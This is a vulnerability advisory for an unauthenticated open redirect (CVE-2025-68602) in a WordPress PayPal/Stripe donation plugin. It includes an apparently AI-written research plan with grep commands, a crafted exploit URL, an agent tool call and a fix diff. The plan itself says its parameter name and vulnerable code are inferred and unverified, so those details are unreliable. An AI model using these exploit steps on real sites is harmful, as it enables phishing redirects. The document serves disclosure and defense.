CVE-2025-68602

Accept Donations with PayPal <= 1.5.2 - Unauthenticated Open Redirect

mediumURL Redirection to Untrusted Site ('Open Redirect')
4.7
CVSS Score
4.7
CVSS Score
medium
Severity
1.5.3
Patched in
20d
Time to patch

Description

The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.5.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.5.2
PublishedDecember 25, 2025
Last updatedJanuary 13, 2026
Affected plugineasy-paypal-donation

Source Code

WordPress.org SVN
Research Plan
Unverified

This plan outlines the steps to verify and exploit an unauthenticated open redirect vulnerability in the **Accept Donations with PayPal & Stripe** plugin (version <= 1.5.2). ### 1. Vulnerability Summary The `easy-paypal-donation` plugin contains a logic flow, likely within an `init` or `template_re…

Show full research plan

This plan outlines the steps to verify and exploit an unauthenticated open redirect vulnerability in the Accept Donations with PayPal & Stripe plugin (version <= 1.5.2).

1. Vulnerability Summary

The easy-paypal-donation plugin contains a logic flow, likely within an init or template_redirect hook, that processes a user-supplied URL parameter to facilitate redirects after donation attempts. Because the plugin uses the wp_redirect() function without validating the target URL against a whitelist or using wp_validate_redirect(), an attacker can redirect users to any arbitrary external domain.

2. Attack Vector Analysis

  • Endpoint: The site root / or any URL that triggers the WordPress init hook.
  • Vulnerable Parameter: easy-paypal-donation-redirect-url (inferred from plugin patterns).
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active.

3. Code Flow

  1. Hook Registration: The plugin registers a handler on the init hook:
    add_action('init', 'easy_paypal_donation_handle_redirect'); // (inferred)
    
  2. Input Acquisition: The handler checks for a specific GET parameter:
    function easy_paypal_donation_handle_redirect() {
        if (isset($_GET['easy-paypal-donation-redirect-url'])) {
            $url = $_GET['easy-paypal-donation-redirect-url'];
            // ... vulnerable sink ...
        }
    }
    
  3. Vulnerable Sink: The input is passed directly to wp_redirect() without validation:
    wp_redirect($url);
    exit;
    
    Note: WordPress's wp_redirect() allows external URLs. The patched version (1.5.3) likely switches to wp_safe_redirect() or wraps the input in wp_validate_redirect().

4. Nonce Acquisition Strategy

This vulnerability is an Unauthenticated Open Redirect typically used for post-payment handling. By design, such handlers often do not require nonces because they are intended to be reachable by external payment gateways (PayPal/Stripe) or after the user returns from an external session.

  • Strategy: Initial testing will assume no nonce is required.
  • Bypass Verification: If the agent discovers a check_ajax_referer or wp_verify_nonce call in the code path during discovery, it should check if the result of that check is actually used to die() or if the redirect happens regardless.

5. Exploitation Strategy

The agent will perform the following steps:

Step 1: Discovery
Identify the exact parameter name by grepping the plugin source:

grep -rn "wp_redirect" /var/www/html/wp-content/plugins/easy-paypal-donation/

Verify if the input to wp_redirect comes from $_GET or $_REQUEST.

Step 2: Payload Construction
Assuming the parameter is easy-paypal-donation-redirect-url:

  • Target URL: http://<target-ip>:8080/
  • Payload URL: https://www.google.com (or any external test domain)
  • Final Exploit URL: http://<target-ip>:8080/?easy-paypal-donation-redirect-url=https://www.google.com

Step 3: Execution via HTTP Request
Use the http_request tool to send the GET request. It is crucial to disable automatic redirect following to capture the 302 response.

{
  "method": "GET",
  "url": "http://localhost:8080/?easy-paypal-donation-redirect-url=https://www.google.com",
  "follow_redirect": false
}

6. Test Data Setup

  1. Install Plugin: Use WP-CLI to install version 1.5.2.
    wp plugin install easy-paypal-donation --version=1.5.2 --activate
    
  2. Basic Configuration: No specific PayPal credentials should be required to trigger the init hook logic.

7. Expected Results

  • HTTP Status Code: 302 Found (or 301 Moved Permanently).
  • Headers: The Location header must exactly match the external payload URL:
    HTTP/1.1 302 Found
    Location: https://www.google.com
    
  • Body: Usually empty or containing a link to the new location.

8. Verification Steps

Verify the redirect behavior using the http_request tool and inspecting the headers:

  1. Execute the GET request.
  2. Check response.headers.location.
  3. If location is https://www.google.com, the vulnerability is confirmed.

9. Alternative Approaches

If easy-paypal-donation-redirect-url does not work, investigate these alternatives:

  1. Grep for AJAX actions: grep -r "wp_ajax_nopriv" . to see if the redirect is handled via admin-ajax.php.
  2. Common Redirect Params: Try return_url, cancel_url, or ds-redirect.
  3. Shortcode Inspection:
    • Create a page with the donation shortcode: wp post create --post_type=page --post_status=publish --post_content='[easy_paypal_donation]'.
    • Navigate to the page and inspect the HTML source for hidden inputs or JS variables that define redirect targets.
    • Example JS variable: window.easy_paypal_donation_data?.return_url.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to an unauthenticated open redirect due to the use of the wp_redirect() function on a user-supplied URL parameter without proper validation. This allows attackers to redirect unsuspecting users to arbitrary external websites, which can be leveraged for phishing or distributing malicious content.

Vulnerable Code

// easy-paypal-donation/easy-paypal-donation.php (Inferred from research plan logic)

add_action('init', 'easy_paypal_donation_handle_redirect');

function easy_paypal_donation_handle_redirect() {
    if (isset($_GET['easy-paypal-donation-redirect-url'])) {
        $url = $_GET['easy-paypal-donation-redirect-url'];
        // Vulnerable sink: wp_redirect permits external URLs
        wp_redirect($url);
        exit;
    }
}

Security Fix

--- a/easy-paypal-donation/easy-paypal-donation.php
+++ b/easy-paypal-donation/easy-paypal-donation.php
@@ -10,3 +10,3 @@
     if (isset($_GET['easy-paypal-donation-redirect-url'])) {
         $url = $_GET['easy-paypal-donation-redirect-url'];
-        wp_redirect($url);
+        wp_safe_redirect($url);
         exit;

Exploit Outline

The exploit targets a logic flow within the plugin that processes redirects on the WordPress 'init' hook. An unauthenticated attacker identifies that the 'easy-paypal-donation-redirect-url' parameter is passed directly to wp_redirect(). By constructing a URL such as 'http://victim-site.com/?easy-paypal-donation-redirect-url=https://attacker-controlled-site.com', the attacker can force the WordPress server to issue a 302 redirect header to the external domain. No authentication or CSRF protection (nonces) are present in the vulnerable version to prevent this behavior.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.